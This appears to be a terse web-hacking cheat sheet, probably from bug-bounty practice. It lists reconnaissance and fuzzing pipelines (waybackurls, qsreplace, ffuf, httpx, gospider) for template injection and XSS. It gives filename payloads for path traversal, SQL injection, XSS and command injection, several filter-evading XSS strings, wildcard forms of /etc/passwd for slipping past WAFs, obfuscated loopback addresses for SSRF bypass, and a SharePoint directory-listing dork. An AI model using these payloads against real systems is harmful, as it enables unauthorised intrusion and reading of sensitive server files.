waybackurls http://target.com | qsreplace "abc{{9*9}}" > fuzz.txt
ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/
waybackurls https://abc.com | grep '=' | qsreplace "abc{{9*9}}" | httpx -match-regex 'abc81' -threads 300 -http-proxy http://127.0.0.1:8080/
search: abc81 in burpsuite search and check
Set filename to:-
../../../tmp/lol.png
for path traversals
sleep(10)-- -.jpg
for SQLi.
<svg onload=alert(document.comain)>.jpg/png
for xss
; sleep 10;
for command injections
Open DevTools and run
urls = []
$$('*').forEach(element => {
urls.push(element.src)
urls.push(element.href)
urls.push(element.url)
}); console.log(...new Set(urls))
gospider -a -s abc.com -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>'
<script src=//⑮.₨></script>
img{background-image:url('javascript:alert()')}
<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>
<img src=`xx:xx`onerror=alert(1)>
<div/onmouseover='alert(1)'> style="x:">
\";alert('XSS');//
"autofocus/onfocus=alert(1)//
'-alert(1)-'
WAF restriction? Use these:
/etc/passwd
/e?c/?asswd
/e*c/*asswd
/??c/?asswd
/??c/?assw?
0
127.00.1
127.0.01
0.00.0
0.0.00
127.1.0.1
127.10.1
127.1.01
0177.1
0177.0001.0001
0x0.0x0.0x0.0x0
0000.0000.0000.0000
0x7f.0x0.0x0.0x1
0177.0000.0000.0001
0177.0001.0000..0001
0x7f.0x1.0x0.0x1
0x7f.0x1.0x1
When you are testing sharepoint applications check this file path that sometimes leads to directory listing:
/_layouts/mobile/view.aspx
Google dork: /_layouts/mobile/view.aspx